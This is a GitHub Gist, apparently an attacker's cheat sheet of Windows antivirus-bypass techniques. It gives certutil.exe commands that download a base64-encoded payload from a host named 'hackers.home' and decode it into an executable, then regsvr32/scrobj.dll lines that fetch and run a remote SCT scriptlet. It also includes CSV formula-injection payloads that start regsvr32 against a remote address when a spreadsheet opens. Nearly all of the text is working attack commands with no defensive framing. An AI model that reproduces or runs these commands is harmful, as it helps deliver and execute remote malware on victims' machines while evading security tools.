Last active
January 26, 2024 04:01
-
-
Save JonnyBanana/4ee05ddadd6370dbbefba706a5664ba0 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # certutil.exe bypass av on download + base64 Decoding | |
| #first base64 encoding the malicious file so that to an edge device it just appears as harmless text. | |
| #Then once the text file is downloaded, the "certutil.exe -decode" command can be used to decode the base64 encoded file | |
| #into the executable. https://www.browserling.com/tools/file-to-base64 | |
| #This is illustrated in Xavier Mertens handler diary. | |
| # https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/ | |
| C:\Temp>certutil.exe -urlcache -split -f "https://hackers.home/badcontent.txt" bad.txt | |
| C:\Temp>certutil.exe -decode bad.txt bad.exe | |
| # certutil.exe bypass av on download - dll injection from regsvr32.exe | |
| #https://www.bleepingcomputer.com/news/security/certutilexe-could-allow-attackers-to-download-malware-while-bypassing-av/ | |
| certutil -urlcache -split -f [serverURL] file.blah | |
| regsvr32.exe /s /u /I:file.blah scrub.dll | |
| #csv malware injection | |
| #https://xorl.wordpress.com/2017/12/11/microsoft-excel-csv-code-execution-injection-method/ | |
| fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!'' | |
| =MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!'' | |
| regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment